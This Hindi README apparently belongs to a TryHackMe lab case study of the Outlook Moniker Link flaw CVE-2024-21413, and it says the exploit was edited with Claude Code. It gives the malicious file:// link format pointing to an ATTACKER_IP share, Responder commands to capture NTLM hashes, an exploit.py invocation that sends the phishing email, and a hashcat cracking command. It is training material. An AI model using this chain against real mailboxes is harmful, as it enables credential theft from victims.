
CVE-2024-21413 का एक केस स्टडी। TryHackMe Moniker Link (CVE-2024-21413) रूम को पैरामीटर के रूप में उपयोग किया गया। एक्सप्लॉइट में claude code के साथ संपादन किए गए।
⚠️ कानूनी चेतावनी: यह रिपॉजिटरी केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए है। सभी प्रदर्शन नियंत्रित और पृथक वातावरण में किए गए हैं। बिना स्पष्ट अनुमति के सिस्टम के खिलाफ इन तकनीकों का उपयोग अवैध और अनैतिक है।
CVE-2024-21413 Microsoft Outlook में एक गंभीर कमजोरी है जो हमलावर को निम्नलिखित करने देती है:
"Moniker Link" नाम Component Object Model (COM) Monikers — स्ट्रिंग द्वारा ऑब्जेक्ट को संदर्भित करने का एक विंडोज तंत्र — के शोषण से आया है, जो Outlook की file:// लिंक्स के खिलाफ सुरक्षाओं को बायपास करता है।
आमतौर पर, Outlook file:// लिंक्स को ब्लॉक करता है जो नेटवर्क संसाधनों की ओर इशारा करते हैं, एक सुरक्षा चेतावनी (Protected View) प्रदर्शित करता है। खामी Outlook द्वारा उन URL को संसाधित करने के तरीके में है जिनमें ! वर्ण होता है — एक Moniker विभाजक।
एक दुर्भावनापूर्ण लिंक इस प्रारूप में:
file:///\\ATTACKER_IP\share\!something
! वर्ण Outlook के पार्सर को URL को COM Moniker संदर्भ के रूप में व्याख्या करने का कारण बनता है, सामान्य सुरक्षा जाँचों को अनदेखा करते हुए। परिणाम:
हमलावर ई-मेल भेजता है → विक्टिम लिंक पर क्लिक करता है → Outlook "!" के साथ URL संसाधित करता है
→ Protected View बायपास → स्वचालित SMB कनेक्शन → NTLM हैश कैप्चर
इस केस स्टडी को सुरक्षित रूप से पुन: पेश करने के लिए:
| मशीन | ऑपरेटिंग सिस्टम | भूमिका |
|---|---|---|
| हमलावर | Kali Linux | SMB लिसनर + एक्सप्लॉइट |
| लक्ष्य | Windows 10/11 जिसमें कमजोर Outlook है | विक्टिम |
महत्वपूर्ण: एक पृथक नेटवर्क (VirtualBox/VMware में NAT या Host-Only) का उपयोग करें। वास्तविक नेटवर्क पर कभी न चलाएं।
# Responder — हैश कैप्चर के लिए SMB/HTTP लिसनर
sudo apt install responder
# Python 3 — एक्सप्लॉइट चलाने के लिए
python3 --version
# मशीनों के बीच कनेक्टिविटी जांचें
ping <IP_Lक्ष्य>
ip a | grep inet
# उस इंटरफ़ेस का IP नोट करें जो लक्ष्य से संचार करता है (जैसे: 192.168.56.10)
Responder एक नकली SMB सर्वर बनाता है जो NTLM प्रमाणीकरण हैश कैप्चर करता है।
sudo responder -I eth0 -v
# eth0 को अपने नेटवर्क इंटरफ़ेस से बदलें
अपेक्षित आउटपुट:
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 192.168.56.20
[SMB] NTLMv2-SSP Username : DESKTOP-लक्ष्य\उपयोगकर्ता
[SMB] NTLMv2-SSP Hash : उपयोगकर्ता::DESKTOP-लक्ष्य:...
python3 exploit.py \
--sender हमलावर@डोमेन.com \
--recipient विक्टिम@डोमेन.com \
--server <IP_ईमेल_सर्वर> \
--attacker-ip 192.168.56.10
जब विक्टिम ई-मेल खोलता है और लिंक पर क्लिक करता है, तो Responder स्वचालित रूप से NTLM हैश कैप्चर करता है। इस हैश का उपयोग किया जा सकता है:
hashcat -m 5600 hash.txt wordlist.txt
पूर्ण और टिप्पणी की गई स्क्रिप्ट के लिए exploit.py फ़ाइल देखें।
हमले के पूर्ण प्रवाह के इंटरैक्टिव विज़ुअलाइज़ेशन के लिए diagrama-ataque.html फ़ाइल देखें।
पूर्ण शमन और बचाव गाइड के लिए MITIGACAO.md फ़ाइल देखें।
कमजोरी के विस्तृत तकनीकी विश्लेषण के लिए CVE-BREAKDOWN.md फ़ाइल देखें।
यह केस स्टडी TryHackMe के माध्यम से आक्रामक सुरक्षा में व्यावहारिक प्रशिक्षण के भाग के रूप में विकसित की गई है।
यह परियोजना जिम्मेदार प्रकटीकरण और नैतिक हैकिंग के सिद्धांतों का पालन करती है। यहाँ मौजूद सभी सामग्री शिक्षा और सुरक्षा स्थिति में सुधार के उद्देश्य से है।
| क्षेत्र | विवरण |
|---|
| CVE | CVE-2024-21413 |
| प्रकटीकरण | 13 फरवरी 2024 (Patch Tuesday) |
| CVSS स्कोर | 9.8 (गंभीर) |
| उत्पाद | Microsoft Outlook |
| प्रकार | RCE + क्रेडेंशियल लीक (NTLM हैश) |
| वेक्टर | नेटवर्क / ई-मेल (बिना पूर्व प्रमाणीकरण के) |
| इंटरैक्शन | उपयोगकर्ता से इंटरैक्शन आवश्यक (लिंक पर क्लिक करना) |
| उपनाम | Moniker Link |